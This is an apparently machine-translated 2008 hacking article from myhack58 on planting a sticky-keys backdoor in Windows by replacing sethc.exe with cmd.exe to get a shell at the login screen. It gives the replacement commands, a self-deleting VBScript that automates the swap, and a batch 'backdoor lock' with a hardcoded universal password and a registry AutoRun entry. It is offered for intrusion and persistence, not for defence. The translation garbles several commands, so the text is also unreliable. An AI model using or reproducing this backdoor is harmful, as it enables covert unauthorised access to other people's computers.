Use sticky keys to create the invasion Vista cool Backdoor-vulnerability warning-the black bar safety net

ID MYHACK58:62200821672
Type myhack58
Reporter 佚名
Modified 2008-12-28T00:00:00


What is sticky keys?

When you're in the Windows operatingsysteminside the continuous press 5 times the Shift key after you see what comes out?

In windows 2 0 0 0/xp/Vista, press shift key 5 times, you can open the sticky position, 会运行sethc.exe and, in the login interface may also be open. It's reminiscent of a WINDOWS screensaver, the program will be replaced with cmd. exe, you can open the shell.

A, concrete replacement method:

XPsystem: the The installation source disc is ejected or the hard disk on the installation directory renamed) cd %widnir%\system32\dllcache ren sethc.exe *. ex~ cd %widnir%\system32 copy /y cmd.exe sethc.exe

Vistasystem: the programming /f c:\windows\system32\sethc.exe cacls c:\windows\system32\sethc.exe /G administrator:F

Note: the above two steps to obtain the permissions command, you can also through the Vista optimization guru to get the right-click menu of elevated function, and then in with. the exe file above, right-direct lift access. Then press the XP method of replacing the file

At the login screen press 5 this SHIFT out cmd shell, and then......

Second, the rear door extensions:

Dim obj, success Set obj = CreateObject("WScript. Shell") success = obj. run("cmd /c programming /f %SystemRoot%\system32\sethc.exe", 0, True) success = obj. run("cmd /c echo y cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F", 0, True) success = obj. run("cmd /c copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe", 0, True) success = obj. run("cmd /c copy %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe", 0, True) success = obj. run("cmd /c del %SystemRoot%\system32\sethc.exe", 0, True) success = obj. run("cmd /c ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)

The second sentence is the most interesting. Hey Responder.... 've encountered similar problems

Then update, add a self-delete, simplify the code: On Error Resume Next Dim obj, success Set obj = CreateObject("WScript. Shell") success = obj. run("cmd /c programming /f %SystemRoot%\system32\with. exe&echo y cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F© %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe© %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc. exedel %SystemRoot%\system32\with. exeren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True) CreateObject("Scripting. FileSystemObject"). DeleteFile(WScript. ScriptName)

Third, the back door lock extensions:

allyesno Note: You can use the cmd lock to cmdshell password verification Hey.... and

Use the following back door lock of the method is to put the code save for bdlock. bat

Then modify the registry location

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor] "AutoRun"="bdlock. bat"

@Echo Off title back door login authentication color a cls set temprandom=%RANDOM% echo please enter the verification code:%temprandom% set/p check= if "%check%"=="%temprandom%%temprandom%" goto passcheck if "%check%"=="%temprandom%" ( rem Backdoor Server Authentication rem if there is no back door to the authentication server please rem comment fall line of code if exist \\trojandownloader$\pass goto passcheck ) echo verify failed pause exit :passcheck echo verification successful If "%passcmdlock%"== Goto endx Set passcmdlock=http://www. xxx. com/ :allyesno Set Errorlevel=>nul Echo please enter the verification code? Set password=allyesno Is a pig>nul Set/p password= rem universal password if "%password%"=="allyesno is a sb" goto endx If %time:~1,1%==0 Set timechange=a If %time:~1,1%==1 Set timechange=b If %time:~1,1%==2 Set timechange=c If %time:~1,1%==3 Set timechange=d If %time:~1,1%==4 Set timechange=e If %time:~1,1%==5 Set timechange=f If %time:~1,1%==6 Set timechange=g If %time:~1,1%==7 Set timechange=h If %time:~1,1%==8 Set timechange=i If %time:~1,1%==9 Set timechange=j set/a sum=%time:~1,1%+%time:~1,1% Set password findstr "^password=%timechange%%time:~1,1%%date:~8,2%%sum%$">nul If "%errorlevel%"=="0" cls&Echo the password is correct&Goto End Echo please contact me for the correct password!& amp;Goto allyesno :End Set password=>nul Set Errorlevel=>nul Echo is very good, very harmonious! :endx